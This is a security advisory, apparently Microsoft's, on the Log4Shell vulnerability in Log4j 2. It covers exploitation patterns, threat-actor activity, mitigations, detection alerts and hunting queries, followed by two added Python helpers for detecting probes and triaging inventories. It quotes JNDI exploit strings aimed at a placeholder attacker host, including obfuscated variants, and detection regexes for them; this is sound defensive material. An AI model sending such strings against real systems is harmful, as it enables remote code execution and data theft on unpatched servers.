Log4j Microsoft threat analysis

Reading time: 14 minutes

Summary

14 December 2021 –

Microsoft is investigating attacks that exploit the remote code execution (RCE) vulnerability in Apache Log4j 2 that was disclosed on 9 December 2021. The vulnerability, tracked as CVE-2021-44228 and dubbed “Log4Shell”, affects Log4j 2 versions 2.0 through 2.14.1.

Log4j 2 is a Java-based logging library that is widely used in the development of enterprise systems, is included in various open-source libraries, and is embedded directly in major software applications. The scope of the impact extends to thousands of products and devices, including Apache products such as Struts 2, Solr, Druid, Flink and Swift. Because this vulnerability lies in a Java library, the cross-platform nature of Java means that it can be exploited on many platforms, including both Windows and Linux. Since many Java-based applications may use Log4j 2, organizations should contact their application and hardware vendors or make sure that their Java applications are running the latest up-to-date version. Developers who use Log4j 2 should make sure they incorporate the latest version of Log4j into their applications as soon as possible to protect users and organizations.

The vulnerability can enable unauthenticated remote code execution, and it is triggered when a specially crafted string supplied by the attacker through a variety of input vectors is parsed and processed by the vulnerable Log4j 2 component.

The specially crafted string that triggers this vulnerability can be identified by several components. The string contains “jndi”, which refers to the Java Naming and Directory Interface. This is followed by the protocol, such as ldap, ldaps, rmi, dns or http, which precedes the attacker's domain.

Once the attacker has full access to and control over the application, they can pursue numerous objectives. Microsoft has observed post-exploitation activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating sensitive data from systems.

Exploitation of this vulnerability relies on the log4j2.formatMsgNoLookups option in the library's configuration being set to False. To mitigate this threat, upgrade Log4j instances to version 2.15.0 and make sure that the log4j2.formatMsgNoLookups option in the library's configuration is set to True. Log4j versions 2.10.0 through 2.14.1 have this option set to False by default – if upgrading is not an option, manually change the option to True. All systems, including those that are not customer facing, are potentially vulnerable to this exploit, so backend systems and microservices should also be upgraded. For Apache Maven or Gradle projects, update Log4j to 2.15.0 in the project's dependency tree.

As Microsoft and the industry at large gain more insight into the impact of this threat, we are publishing technical information that can help with detecting, investigating and mitigating attacks, as well as guidance on using Microsoft security solutions to increase resilience against related attacks.

Do you need an assessment, hunting and/or support in your environment regarding this risk? Go directly to ‘Advanced Hunting‘ or contact us directly.

Because of the international impact and the English-based technical terminology, the rest of this article is written in English.

Analysis

The vulnerability is a remote code execution vulnerability that can allow an unauthenticated attacker to gain complete access to a target system. It can be triggered when a specially crafted string is parsed and processed by the vulnerable Log4j 2 component. This could happen through any user-provided input.

The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to fingerprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:

${jndi:ldap://[attacker site]/a}

An attacker performs an HTTPS request against their target system, which generates a log entry using Log4j that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability will then cause the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.

Given the fact that logging code and functionalities in applications and services are typically designed to process a variety of external input data coming from upper layers and from many possible vectors, the biggest risk factor of this vulnerability is predicting if an application has a viable attack vector path that will allow the malformed exploit string to reach the vulnerable Log4j 2 code and trigger the attack.

A common pattern of exploitation risk, for example, is a web application with code designed to process usernames, referrer, or user-agent strings in logs. These strings are provided as external input (e.g., a web app built with Apache Struts). An attacker can send a malformed username or set user-agent with the crafted exploit string hoping that this external input will be processed at some point by the vulnerable Log4j 2 code and trigger code execution.

Figure: CVE-2021-44228 exploit vectors and attack chain

As security teams work to detect the exploitation of the vulnerability, attackers have added obfuscation to these requests in an attempt to evade detections based on request patterns. We’ve seen things like running a lower or upper command within the exploitation string (${jndi:${lower:l}${lower:d}a${lower:p}) and even more complicated obfuscation attempts (${${::-j}${::-n}${::-d}${::-i}) that are all trying to get around string-matching detections.

While the vast majority of observed activity at time of publish has been scanning, exploitation and post-exploitation activities have also been observed. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.

Update [12/14/2021]: As of December 14, 2021, Microsoft has observed multiple threat actors leveraging the CVE-2021-44228 vulnerability in active attacks. Microsoft will continue to monitor threats taking advantage of this vulnerability and provide updates as they become available. To protect against these threats, we recommend that organizations follow the guidance detailed in succeeding sections. 

Nation-state activity

MSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives.

For example, MSTIC has observed PHOSPHORUS, an Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.

In addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems. 

Access brokers associated with ransomware

MSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.

Mass scanning activity continues

The vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of this vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the jndi:ldap:// request to launch bash commands on Linux and PowerShell on Windows.

Microsoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.

Mitigations

Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.

Vulnerability-specific mitigations
  • Update all Log4j2 deployments to use log4j-2.15.0 and apply the security updates for CVE-2021-44228. Upgrade all products, applications and components that consume Log4j2. Apply all security updates for Log4J listed in this advisory.
  • In case the Log4j vulnerable component cannot be updated, configure the parameter log4j2.formatMsgNoLookups to be set to ‘true’ when starting the Java Virtual Machine.
  • All systems, including those that are not customer facing, are potentially vulnerable to this exploit, so backend systems and microservices should also be upgraded. For Apache Maven or Gradle projects, update Log4j to 2.15.0 on the dependency tree of the project.
General hardening mitigations that might help detect exploitation and post-exploitation activities
  • Run the latest version of your operating systems and applications. Turn on automatic updates or deploy the latest security updates as soon as they become available.
  • Use a supported platform, such as Windows 10, to take advantage of regular security updates.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block majority of new and unknown variants.
  • Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
  • Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Use device discovery to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.
  • Turn on the following attack surface reduction rule to block or audit activity associated with this threat:

Assess rule impact before deployment

You can assess how an attack surface reduction rule might impact your network by opening the security recommendation for that rule in threat and vulnerability management. In the recommendation details pane, check the user impact to determine what percentage of your devices can accept a new policy enabling the rule in blocking mode without adverse impact to user productivity.

Screenshot of security recommendations in threat and vulnerability management
  • For customers with RiskIQ EASM and Threat Intelligence,  you can view threat intelligence on this CVE, including mitigation guidance and IOCs, here. Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. For example, it’s possible to surface all observed instances of Apache or Java, including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you.

For a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the Attack Surface Intelligence Dashboard Log4J Insights tab.   

  • Customers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall Premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all East-West traffic and outbound traffic to the internet. The vulnerability rulesets are continuously updated and have included the CVE-2021-44228 vulnerability for different scenarios, including the UDP, TCP and HTTP/S protocols, since December 10th, 2021. The screenshot below shows all the scenarios that are actively mitigated by Azure Firewall Premium.

Recommendation: Customers are recommended to configure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2021-44228 exploit.   

Scenarios actively mitigated by Azure Firewall Premium

Customers using Azure Firewall Standard can migrate to Premium by following these directions. Customers new to Azure Firewall Premium can learn more about Firewall Premium in its documentation.

  • For Azure customers: Azure Web Application Firewall (WAF) updated Default Rule Set (DRS) versions 1.0 and 1.1, which are available for Azure Front Door global deployments. Rule 944240 “Remote Command Execution” under Managed Rules was updated to help in detecting and mitigating this vulnerability by inspecting requests’ headers, URI, and body. This rule is already enabled by default in block mode for all existing WAF Default Rule Set configurations. Customers using WAF Managed Rules would have already received enhanced protection for the Log4j2 vulnerability (CVE-2021-44228), no additional action is needed.

Enable Azure Web Application Firewall (WAF) policy with Default Rule Set 1.0/1.1 on Front Door deployments to immediately avail of additional protection from this threat, if not already enabled. For customers who have already enabled DRS 1.0/1.1, no action is needed. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.

Screenshot of WAF policy configuration

Note: The above protection is also available on Default Rule Set version 2.0, which is available under preview on Azure Front Door Premium. Customers using Azure CDN Standard from Microsoft can also avail of the above protection by enabling DRS 1.0.

More information for Managed Rules and Default Rule Set on Web Application Firewall can be found here.

Detection details

Antivirus

Microsoft Defender Antivirus detects threat components and behaviors with the following signatures:

On Windows:

On Linux:

Shared malware and generic detections

Microsoft Defender Antivirus incorporates next-generation antivirus capabilities, including machine learning and behavioral detection. This can result in overlapping detections, particularly of first-seen components and polymorphic variants. The detection names are listed here for reference, but related alerts are not actively monitored.

Endpoint detection and response (EDR)

Alerts with the following titles in the security center can indicate threat activity on your network:

  • Network connection seen in CVE-2021-44228 exploitation (detects network traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity)
  • Possible exploitation of CVE-2021-44228 (detects coin miners, shells, backdoor, and payloads such as Cobalt Strike used by attackers post-exploitation)
  • Possible Log4j exploitation
  • Suspicious script launched (detects multiple behaviors, including suspicious command launch post exploitation)

Alerts with the following titles in the Security Center can indicate threat activity on your network but may not necessarily be related to exploitation of CVE-2021-44228. We are listing them here as well, as these generic behavioral alerts can also trigger in customer environments, and it is highly recommended that they are triaged and remediated immediately:

  • Suspicious remote PowerShell execution
  • Download of file associated with digital currency mining
  • Process associated with digital currency mining
  • Cobalt Strike command and control detected
  • Suspicious network traffic connection to C2 Server
  • Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)

Alerts with the following titles in the Security Center can indicate exploitation attempts against your network that may be successful or not, depending on whether the specially crafted exploit string ends up being processed by a vulnerable Log4j instance in your environment:

  • Exploitation attempt against Log4j (CVE-2021-4428) – This is part of a Microsoft 365 Defender chain event detection triggered in Microsoft Defender for Cloud Apps (formerly Microsoft Cloud Application Security) that detects attempts to exploit the CVE-2021-44228 vulnerability using a specially crafted JNDI string (such as in the User-Agent) against cloud applications.

Screenshot of the Microsoft 365 Defender chain event detection triggered in Microsoft Defender for Cloud Apps

Microsoft Defender for Cloud

Microsoft Defender for Cloud’s threat detection capabilities have been expanded to surface exploitation of CVE-2021-44228 in several relevant security alerts:

On Windows

  • Detected obfuscated command line
  • Suspicious use of PowerShell detected

On Linux

  • Suspicious file download
  • Possible Cryptocoinminer download detected
  • Process associated with digital currency mining detected
  • Potential crypto coin miner started
  • A history file has been cleared
  • Suspicious Shell Script Detected
  • Suspicious domain name reference
  • Digital currency mining related behavior detected
  • Behavior similar to common Linux bots detected

Organizations using Microsoft Defender for Cloud can use the Inventory tools to begin investigations before there’s a CVE number. With the Inventory tools, there are two ways to determine exposure:

Screenshot of Microsoft Defender for Cloud inventory tools searching by filters

Note: This doesn’t replace a search of your codebase. It’s possible that software with integrated Log4j libraries won’t appear in this list, but this is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this tech community post.

Microsoft Defender for IoT

Microsoft Defender for IoT has released a dedicated threat Intelligence update package for detecting Log4j 2 exploit attempts on the network (example below).  

Screenshot of Microsoft Defender for IoT detection

The package is available for download from the Microsoft Defender for IoT portal (click Updates, then Download file; MD5: 4fbc673742b9ca51a9721c682f404c41).

Screenshot of Microsoft Defender for IoT intelligence update

Microsoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release, click here for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.

Working with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the Defender for IoT portal by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the documentation.

Indicators of Compromise

Microsoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml

Microsoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.

Advanced hunting

To locate possible exploitation activity, run the following queries.

Suspected exploitation of Log4j vulnerability

Look for exploitation of this vulnerability using known parameters in the malicious string. This query surfaces exploitation but may surface legitimate behavior in some environments.  Run query

DeviceProcessEvents
| where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')
//Removing FPs
| where not(ProcessCommandLine has_any('stackstorm', 'homebrew'))

Regex to identify malicious exploit string

Look for the malicious string needed to exploit this vulnerability. Run query

DeviceProcessEvents
| where ProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'     
or InitiatingProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'
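The two queries above look for the literal jndi pattern in process command lines, while the Analysis section shows attackers hiding that pattern behind nested ${lower:…} and ${::-…} lookups. As an added example (not part of the original post or Microsoft's own code), the following Python script applies the same detection idea to plain web-access log lines: it first resolves the lower/upper and ":-default" lookups from the inside out, then matches the normalized string against the jndi/protocol prefix used in the KQL regex, and applies the same false-positive allowlist as the first query. The log lines, the attacker.example host, and the small lookup emulation are constructed assumptions; only the lookup forms shown on the page are emulated.

```python
import re

# Innermost Log4j 2 lookup: a ${...} whose body contains no nested ${ or }.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# Protocols from the page's KQL regex, after the "${jndi:" prefix.
JNDI_PROBE = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|http|https|iiop):", re.I)

# Constructed sample access-log lines (assumption: User-Agent is the last field).
SAMPLE_LOG = [
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '203.0.113.8 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.example/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${upper:rmi}://attacker.example/x}"',
    '198.51.100.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
]


def _resolve_lookup(match):
    """Emulate the lookup forms seen in obfuscated probes.

    Assumption: only lower/upper and the ':-default' fallback are emulated;
    every other lookup (including jndi itself) is kept verbatim.
    """
    body = match.group(1)
    key, sep, rest = body.partition(":")
    if sep and key.lower() == "lower":
        return rest.lower()            # ${lower:L} -> l
    if sep and key.lower() == "upper":
        return rest.upper()            # ${upper:l} -> L
    if ":-" in body:
        return body.split(":-", 1)[1]  # ${::-j} -> j (unknown key, default value)
    return match.group(0)


def normalize_lookups(text, max_rounds=25):
    """Resolve nested lookups from the inside out until the string stops changing."""
    for _ in range(max_rounds):
        resolved = _INNER_LOOKUP.sub(_resolve_lookup, text)
        if resolved == text:
            break
        text = resolved
    return text


def find_log4shell_probes(lines, allowlist=("stackstorm", "homebrew")):
    """Return (line_number, normalized_line) for lines carrying a JNDI lookup.

    The allowlist mirrors the false-positive exclusion in the page's first query.
    """
    hits = []
    for number, line in enumerate(lines, 1):
        normalized = normalize_lookups(line)
        if any(term in normalized.lower() for term in allowlist):
            continue
        if JNDI_PROBE.search(normalized):
            hits.append((number, normalized))
    return hits


if __name__ == "__main__":
    for number, normalized in find_log4shell_probes(SAMPLE_LOG):
        print(f"line {number}: {normalized}")
```

Normalizing before matching is what lets the three obfuscated variants collapse to the same `${jndi:…` prefix; keeping the normalized line in the hit gives the analyst the de-obfuscated host without having to decode it by hand.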

Possible Malicious Indicators in Cloud Application Events

This query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application or Account name. The hits returned from this query are most likely unsuccessful attempts, however the results can be useful to identity attackers’ details such as IP address, Payload string, Download URL, etc.

CloudAppEvents
| where Timestamp > datetime("2021-12-09")
| where UserAgent contains "jndi:"
or AccountDisplayName contains "jndi:"
or Application contains "jndi:"
or AdditionalFields contains "jndi:"
| project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields

Possible vulnerable applications via M365D Threat and Vulnerability Management

This query looks for possibly vulnerable applications using the affected Log4j component. Please triage the results to determine applications and programs that may need to be patched and updated. Run Query.

DeviceTvmSoftwareInventory
| where SoftwareName contains "log4j"
| project DeviceName, SoftwareName, SoftwareVersion
Screenshot of surfacing possibly vulnerable devices using Advanced Hunting

Finding possible vulnerable applications and devices via software inventory

Customers can also surface possibly vulnerable devices via Threat and Vulnerability Management capability in Microsoft Defender for Endpoint as part of Microsoft 365 Defender. With endpoint discovery, unmanaged devices with this vulnerability are also surfaced so they can be onboarded and secured.
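The inventory query above returns DeviceName, SoftwareName and SoftwareVersion and leaves the triage to the reader. As an added example that is not part of the original post, this Python helper takes rows of that shape and sorts them into the actions the Mitigations section gives: upgrade to 2.15.0, use log4j2.formatMsgNoLookups=true as an interim measure where the option exists (2.10.0 and later), or review manually when the version cannot be parsed or lies outside the 2.0–2.14.1 range the page covers. The inventory rows are constructed sample data; the verdict names and the parse_version helper are this example's own.

```python
import re

# Version boundaries as stated on the page for CVE-2021-44228.
AFFECTED_MIN = (2, 0, 0)      # first affected Log4j 2 release
AFFECTED_MAX = (2, 14, 1)     # last affected release
FIXED = (2, 15, 0)            # upgrade target named in the Mitigations section
NO_LOOKUPS_MIN = (2, 10, 0)   # log4j2.formatMsgNoLookups exists from this release on

# Action text per verdict, taken from the Mitigations section; dict order is the worklist order.
ACTIONS = {
    "VULNERABLE_UPGRADE_ONLY": "Upgrade to log4j-2.15.0 (formatMsgNoLookups not available before 2.10.0)",
    "VULNERABLE_UPGRADE_OR_SET_FLAG": "Upgrade to log4j-2.15.0; interim: start the JVM with -Dlog4j2.formatMsgNoLookups=true",
    "UNKNOWN_VERSION": "Version not parseable: inspect the deployed jar on the host",
    "REVIEW": "Outside the 2.0-2.14.1 range: confirm with the vendor",
    "PATCHED": "No action required",
}
PRIORITY = list(ACTIONS)

# Constructed sample rows shaped like the DeviceTvmSoftwareInventory projection.
SAMPLE_INVENTORY = [
    {"DeviceName": "web-01", "SoftwareName": "apache_log4j", "SoftwareVersion": "2.14.1"},
    {"DeviceName": "batch-02", "SoftwareName": "apache_log4j", "SoftwareVersion": "2.8.2"},
    {"DeviceName": "api-03", "SoftwareName": "apache_log4j", "SoftwareVersion": "2.15.0"},
    {"DeviceName": "legacy-04", "SoftwareName": "apache_log4j", "SoftwareVersion": "1.2.17"},
    {"DeviceName": "iot-05", "SoftwareName": "apache_log4j", "SoftwareVersion": ""},
    {"DeviceName": "db-06", "SoftwareName": "openjdk", "SoftwareVersion": "11.0.13"},
]


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.8' -> (2, 8, 0); anything unparseable -> None."""
    match = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    if not match:
        return None
    return (int(match.group(1)), int(match.group(2)), int(match.group(3) or 0))


def triage(row):
    """Return the verdict for one inventory row, or None if it is not Log4j at all."""
    if "log4j" not in row["SoftwareName"].lower():
        return None
    version = parse_version(row["SoftwareVersion"])
    if version is None:
        return "UNKNOWN_VERSION"
    if version >= FIXED:
        return "PATCHED"
    if AFFECTED_MIN <= version <= AFFECTED_MAX:
        if version >= NO_LOOKUPS_MIN:
            return "VULNERABLE_UPGRADE_OR_SET_FLAG"
        return "VULNERABLE_UPGRADE_ONLY"
    return "REVIEW"


def build_worklist(rows):
    """Attach verdict and action to every Log4j row and sort worst-first."""
    worklist = []
    for row in rows:
        verdict = triage(row)
        if verdict is None:
            continue
        worklist.append({**row, "status": verdict, "action": ACTIONS[verdict]})
    worklist.sort(key=lambda item: PRIORITY.index(item["status"]))
    return worklist


if __name__ == "__main__":
    for item in build_worklist(SAMPLE_INVENTORY):
        print(f'{item["DeviceName"]:10} {item["SoftwareVersion"] or "?":8} {item["status"]:32} {item["action"]}')
```

Rows with an empty or unparseable version are deliberately ranked above "review" rather than dropped: an inventory entry that cannot be versioned is exactly the case the Note about integrated Log4j libraries warns about, so it needs a look at the host.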

Screenshot of surfacing possibly vulnerable devices using Software Inventory

Microsoft Sentinel queries

Possible exploitation of Apache log4j component detected

This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache.  Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.

Cryptocurrency miners EXECVE

This query hunts through EXECVE syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. It returns a table of suspicious command lines.

Azure WAF Log4j CVE-2021-44228 hunting

This hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving Log4j vulnerability.

Log4j vulnerability exploit aka Log4Shell IP IOC

This hunting query identifies a match across various data feeds for IP IOCs related to the Log4j exploit described in CVE-2021-44228.

Suspicious shell script detected

This hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in Log4j component of Apache to evade detection and stay persistent or for more exploitation in the network.

Azure WAF matching for Log4j vuln (CVE-2021-44228)

This query alerts on a positive pattern match by Azure WAF for CVE-2021-44228 Log4j exploitation attempt. If possible, it then decodes the malicious command for further analysis.

Suspicious Base64 download activity detected

This hunting query helps detect suspicious Base64-encoded, obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used in exploitation of the Log4j vulnerability in order to evade detection and stay persistent in the network.

Linux security-related process termination activity detected

This query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise, as seen recently in attacks exploiting the CVE-2021-44228 vulnerability.

Vulnerable machines related to log4j CVE-2021-44228

This query uses the Azure Defender Security Nested Recommendations data to find machines vulnerable to log4j CVE-2021-44228. 

Microsoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell

References

Change log

  • 2021-12-15 05:00 UTC | Updated investigation, analysis, detection, and protection details
  • 2021-12-14 06:51 UTC | Updated detection and protection details
  • 2021-12-13 00:05 UTC | Updated protection details
  • 2021-12-12 05:00 UTC | Updated detection and protection details
  • 2021-12-11 02:03 UTC | Entry created